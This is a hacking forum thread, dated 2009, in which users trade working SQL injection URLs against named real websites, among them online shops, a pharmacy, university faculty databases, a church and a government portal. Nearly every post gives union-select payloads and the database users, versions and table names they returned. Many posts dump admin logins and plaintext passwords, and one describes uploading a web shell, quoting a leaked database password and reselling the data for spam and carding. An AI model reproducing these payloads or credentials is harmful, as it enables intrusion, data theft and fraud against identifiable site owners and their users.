SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Gorev

    For Военный: young man.. never give up
    1.http://www.usadba.ru/city/flat/5481/?-1+order+by+5--

    version()- 5.0.67
    user() - [email protected]
    database()-base_usadba


    blind SQLi... the well-known SIPT will help us... character-by-character brute force and voilà

    tables 1-16 are the standard ones... and after that

    Getted String number 17:a_flats

    Getted String number 18:a_flats_arenda

    Getted String number 19:a_houses

    Getted String number 20:b_dormitory_arenda

    Getted String number 21:drm_s_highway

    Getted String number 22:l_house_area

    Getted String number 23:l_house_informal

    Getted String number 24:mmedia_city

    Getted String number 25:mmedia_drm

    Getted String number 26:mmedia_house

    well, I think it's clear... dig further yourself.... good luck
     
  2. Gedj

    Code:
    http://heyyou.ru/?page=proooblogs&id=-1+union+select+1,2,3,version(),5,6,7,8,9--
     
    3 people like this.
  3. mailbrush

    Code:
    http://www.ypr.org.au/view_history.php?historyID=-6'+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION())/*
    [b]User:[/b] ypr@localhost
    [b]Database:[/b] ypr_org_au
    [b]Version:[/b] 4.1.20
    
    http://www.nihonjujutsu.com/history.php?HistoryID=-7+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
    [b]User:[/b] jujutsu@localhost
    [b]Database:[/b] jujutsu
    [b]Version:[/b] 5.0.32-Debian_7etch8-log
    
    http://www.onegi.com.tw/AboutOneGi/History_Content.php?HistoryID=-2+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20--
    [b]User:[/b] onegi@localhost
    [b]Database:[/b] onegi
    [b]Version:[/b] 5.1.30-community
    
    http://www.xinanchem.com/historyxiangxi.php?historyId=-143+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5/*
    [b]User:[/b] root@localhost
    [b]Database:[/b] wynca2
    [b]Version:[/b] 4.0.13-nt
    
    http://www.wynca.com/en/historyxiangxi.php?historyId=-110+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5/*
    [b]User:[/b] root@localhost
    [b]Database:[/b] wynca2 
    [b]Version:[/b] 4.0.13-nt
    
    http://www.welltec.com.hk/news_see.php?thisid=-18+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
    [b]User:[/b] root@localhost 
    [b]Database:[/b] welltec_com_hk 
    [b]Version:[/b] 5.0.26-community-nt
    
    http://www.salmonsupporters.com/detailsupporters.php?thisid=-32+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10,11,12/*
    [b]User:[/b] [email protected]
    [b]Database:[/b] wssDBadmin
    [b]Version:[/b] 4.1.22-max-log
    
    http://www.lyrics.nl/showsong.php?songid=28151&artiestid=552&historyid=-12632+UNION+SELECT+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3/*
    [b]User:[/b] filmenmu@localhost
    [b]Database:[/b] filmenmu
    [b]Version:[/b] 4.1.22
    
    http://www.cosmos-ml.com/en/news_see.php?thisid=-1+UNION+SELECT+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
    [b]User:[/b] root@localhost
    [b]Database:[/b] dg_cosmos
    [b]Version:[/b] 5.0.26-community-nt
    
    http://www.orcaschurch.org/Church_Notes.php?thisID=-28+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5%20--
    [b]User:[/b] orcaschurch@localhost
    [b]Database:[/b] orcaschurch
    [b]Version:[/b] 5.0.58
    
    http://www.gvchristian.com/videopopup.php?thisid=307+UNION+SELECT+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10/*
    [b]User:[/b] root@localhost
    [b]Database:[/b] fatguys_gvcc
    [b]Version:[/b] 5.0.45-Debian_1ubuntu3-log
    These are from yesterday =). My SQL injections. Work them...
     
    1 person likes this.
  4. spherics

    dofp_ab@localhost
    4.1.22-standard
    dofp_db

    Database Version: 5.0.46-enterprise-gpl-log
    Database name: espin_dbo
    User name: [email protected]

    PageRank 7

    Database Version: 5.0.32-Debian_7etch5-log
    Database name: poetry
    User name: [email protected]

    User:[email protected]
    Version:5.0.67-log
    Database:carbonrecords


    And a finished-off little shop for dessert -)

    http://www.europanet.com.br/site/index.php?cat_id=32&pag_id=-13673+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,version(),45,46,47,48,49,50,51,52,53,54,55--


    Database Version: 5.0.18-log
    Database name: europanet
    User name: arima@localhost

    In short, there are 38 databases there, good for everyone: spam, ICQ, carding, etc...


    Getting Data from table loja_admin (11 Rows) from database eurobest_commerce
    Fields id_admin:usuario:senha:superadmin




    Fields usuario:senha:admin_cat:admin_ftp


    In short, the most important thing was to upload a shell..
    Got into the admin panel through this guy

    marco:36ad6fa45d632cd4:1:/ Password hash MySQL:36ad6fa45d632cd4:portugal FTP 200.229.132.34:21

    And then uploaded it without trouble.
    Next I dug up the config; there's an important person in it

    // Database username
    $phpAds_config['dbuser'] = 'arima';

    // Database password
    $phpAds_config['dbpassword'] = 'spectroman21';

    Access to all the databases!

    safe mode is disabled -)

    Enjoy.


    PostgreSQL 7.2.7 on i686-pc-linux-gnu, compiled by GCC 2.96

    http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,version()--&r=/list.php

    http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,TABLENAME/**/from/**/PG_TABLES+LIMIT+1,1--&r=/list.php

    itemimages
    CATEGORIES
    items
    pg_aggregate
    pg_am
    pg_amop
    pg_amproc
    pg_attrdef
    pg_attribute
    pg_xactlock
    pg_type
    pg_trigger
    pg_statistic
    pg_shadow
    pg_rewrite
    pg_relcheck
    pg_proc
    pg_operator
    pg_opclass
    pg_listener
    pg_largeobject
    pg_language
    pg_inherits
    pg_index
    pg_group
    pg_description
    pg_database
    pg_class

    I can't get any further, maybe someone else can....




    DATAMP - Directory of American Tool and Machinery Patents

    http://www.datamp.org/displayPatent.php?id=809809809809837107+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--&pn=15

    Database Version: 5.0.67-community-nt
    Database name: datamp
    User name: datamp_owner@localhost





    http://www.datamp.org/displayPatent.php?id=809809809809837107+UNION+SELECT+1,2,3,4,5,CONCAT((SELECT+CONCAT(steward_id,username,password,name,email)+FROM+datamp.data_stewards+LIMIT+19,1)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--





    I liked this mailbox -) [email protected]
     
    #7464 spherics, 20 Jan 2009
    Last edited: 21 Jan 2009
    2 people like this.
  5. TELO

    online store of accessories and gifts
    table with passwords and emails
    Code:
    http://eluxus.com.ua/catalog/index.php?_a=view&_cat=-73 UNION SELECT 1,2,concat_ws(char(58),email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM useraccounts --
    admin panel
    http://eluxus.com.ua/admin/
    I don't know who the admin is, dig =)

    topmobila store

    Code:
    http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,concat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7,8,9,10,11,12,13,14 --
    version::5.0.67-community
    user::shmel_admin@localhost
    database::shmel_mobiles
    Output of all tables
    Code:
    http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12,13,14 FROM INFORMATION_SCHEMA.TABLES --
    some Belarusian chat
    Code:
    http://www.irc.by/modules/articles/article.php?id=-16 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,USER(),DATABASE(),VERSION()),8,9,10,11,12,13,14,15,16,17,18,19,20 --
    version::4.1.25
    User::ircby_xoops@localhost
    database::ircby_xoops

    online boutique for women
    Code:
    http://all-perfumes.com.ua/index.php?act=cat&id=-66 UNION SELECT concat_ws(0x3a,USER(),DATABASE(),VERSION()),2,3,4,5 --
    version::4.1.12-standard-log
    user::drnova_dnj0Pw3@localhost
    database::drnova_apP4n1c7
     
    #7465 TELO, 21 Jan 2009
    Last edited: 21 Jan 2009
    1 person likes this.
  6. spherics

    A little shop -)


    Database Version: 5.0.67-community-log
    Database name: zoomacti_products
    User name: zoomacti_dare2li@localhost


    Fields email:password


    Etc...


    And one more little shop


    Database Version: 5.0.45
    Database name: jfa
    User name: jfa@localhost

     
    #7466 spherics, 21 Jan 2009
    Last edited: 21 Jan 2009
    1 person likes this.
  7. Cennarios

    http://www.ambisousa.pt/php/inserir_comentario.php?id=-1+union+select+1,2,3,4,login,passwd+from+users--


    http://www.ambisousa.pt/admin/


    login:ambisousa
    pass:sousinha

    Bam!!!
     
    1 person likes this.
  8. yarbabin

    Code:
    http://sim-cat.com/cats.php?sex=-0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&lang=eng
    
    4.0.27-max-log

    Code:
    http://www.stylecat.ru/cats.php?sex=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29--&breed=kbo&lang=rus

    5.0.51a-log 2
     
    1 person likes this.
  9. Maestus

    The Winston Churchill Memorial Trust

    The query below takes this form because there was no other way around the following error:
    Fatal error: Database error #1267: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
    which occurred, for example, with the functions user(), database(), version(). Table fields, however, go through without problems.

    database():churchilltrust
    user():winston@localhost


    Code:
    http://www.churchilltrust.com.au/news.php?id=-2+union+select+1,password,3,username,5,6+from+users/*
    username:admin
    password:4dm1n
     
    4 people like this.
  10. TELO

    gift shop
    Code:
    http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,3,concat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7,8,9,10,11,12,13,14,15%20%20--
    version::4.1.22
    user::u_chudesa@localhost
    database::chudesa
    the users table contained the following people:
    login:test login:vika
    passwors:123 password:pjhbr
    Code:
    http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,login,pass,5,6,7,8,9,10,11,12,13,14,15%20from%20users%20limit%200,1%20--
    another gift shop
    Code:
    http://www.podarunky.kiev.ua/showpage.php?id=9999999%20UNION%20SELECT%201,2,3,c oncat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7%2 0%20--
    version::4.1.22-log
    user::sitemaker@localhost
    database::giftBase

    MEDIMAG medicine store
    Code:
    http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws(0x3a,USER(),DATABASE(),VERSION()),10,11,12,13,14,15,16,17,18,19,20%20--
    version::4.1.22
    user::u_medimag_ap@localhost
    database::medimag_apteka

    table with passwords
    Code:
    http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,login,password,10,11,12,13,14,15,16,17,18,19,20%20from%20users%20--
    login::admin
    password::shutnick

    The admin panel login is through the site; you can actually place an order and confirm it.

    Bookstore
    Code:
    http://market.factor.ua/books.php?book_id=-811%20UNION%20SELECT%201,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20--
    version::4.1.20
    user::market@localhost
    database::market
     
    #7470 TELO, 22 Jan 2009
    Last edited by a moderator: 22 Jan 2009
    2 people like this.
  11. попугай

    PR7 webUser@localhost:5.0.27-community-nt-log:rc-web
     
    1 person likes this.
  12. beerhack

    version: 5.0.22
     
  13. Maestus

    Unitech

    user:[email protected]
    database:uniroot
    version:4.1.22-max-log

    http://unitech.com.az/admin/
    username:uni
    password:777
     
  14. pinky07

    http://www.uztest.ru
    the site has a database of more than 7.5 thousand teachers =))
    db - uztest3_temp
    version - 5.0.51a
    user - uztest3_temp@localhost
    admin panel - login: oldteacher pass:591121
    forum admin panel - login:admin pass:goldfire757
    P.S. all passwords are output in unencrypted form =)))
     
    2 people like this.
  15. Велемир

    http://www.valitsus.ee/index.php?rep_id=294943&tpl=1007%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&external=&search=&aasta=

    Tables:
    admin,config,tbl,version

    http://www.valitsus.ee/brf/admin

    Access is restricted by IP, if I'm not mistaken yet again =______________=
     
  16. pinky07

    Programming tournament site =) http://www.icl.ru
    admin panel - pass:wordplay login: pupucya
    admin passwords are encrypted with MYSQL-4.x-Hash
    output of user information:
    user passwords are in unencrypted form ;-)
    db - turnir;
    db version - 5.0.15-nt
    user - [email protected]
     
  17. crystalbit

    Code:
    http://www.bioticregulation.ru/foto/show.php?ng=5&lang=en&nc=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13--
    http://www.bioticregulation.ru/foto/show.php?ng=5&lang=en&nc=-1+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=0x7070656c626132325f666f746f--
    Code:
    http://www.inta.gatech.edu/faculty-staff/listing.php?uID=-20+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19--
    Code:
    http://dms.dartmouth.edu/faculty/facultydb/view.php?uid=-139+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--
    Code:
    tables: biblio,facultydb,profile,users
    columns(users): uid,name,add_perm,edit_perm,delete_perm,superuser
    columns(profile): id,facultydb_id,cv_filename,dv,bio_filename,bio
    columns(facultydb): uid,Personal_ID,status,Name_DND,Name_First,Name_Middle,Name_Last,Name_Prefix,Name_Suffix,Position_Title,Birth_Date,Department,Degree,Education,Interests,Programs,Courses,Grant_Support,Core_Facilities,URL,Telephone_Number,Facsimile_Number,Email_Address,Office,Assistant,Asst_Telephone,Asst_Email,Address1,Address2,Address3,City,State,Zip_Code
    columns(biblio): Title,Authors,Source,PMID,Medline_AN,id,uid
     
    #7477 crystalbit, 23 Jan 2009
    Last edited by a moderator: 23 Jan 2009
  18. попугай

    uncga@localhost:4.1.20-log:uncga
     
  19. _evgeniy_

    Code:
    http://market-doors.ru/show_cat2.php?grid=-5+union+select+concat_ws(0x3a,username,password)+FROM+admin
    
    [email protected]
    5.0.67-log
    u55818

    admin:588eb5181b3ba704
    http://market-doors.ru/admin.php

    Code:
    http://www.kubanjob.ru/vacanc.php?id=-15948+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20
    
    Uwww2727S@localhost
    4.1.21-log
    udb2727

    Code:
    http://arendyi.ru/detail.php?de=-2362+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11
    
    [email protected]
    5.0.67-log
    u8766_arendyi

    http://www.arendyi.ru/login.php

    Ольга:11111,
    Ольга:777,
    Ольга:222222,
    Ольга:jkmuf,
    Рая:2332

    Code:
    http://allookna.ru/?page=-19+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11
    [email protected]
    5.0.67-log
    u52548

    admin:fkkjadmin
    http://allookna.ru/admin/

    Code:
    http://shark63.ru/index.php?cat=-3+union+select+concat_ws(0x3a,user(),version(),database()),2--&subcat=0&det=0
    [email protected]
    5.0.67-log
    u57848

    - logins
    shark:dZral

    - logins_base
    shark:dZral,avtorental:sc56Rnt,hertz:hop42gDr,shark:ro6tSf35,avtorental:HQr57tu,hertz:htf47gH

    - logins_buh_flagman
    shark:dZral,shark:sdf7A

    - logins_buh_ssp
    shark:dZral,shark:sdf7A

    http://shark63.ru/buh_shark
    http://shark63.ru/buh_flagman
    http://shark63.ru/buh_ssp
    http://shark63.ru/base
    http://shark63.ru/client

    Code:
    http://www.tetevent.ru/cat.php?bid=-37+union+select+1,concat_ws(0x3a,user(),version(),database())--
    
    [email protected]
    5.0.67-log
    u64338

    Code:
    http://www.tetevent.ru/cat.php?bid=-37+union+select+1,concat_ws(0x3a,name,pass)+FROM+users--
    
    admin:1

    http://www.tetevent.ru/admin/
     
  20. sabe

    Berkeley.edu PR 9
    5.x branch.. but nothing (
     
    3 people like this.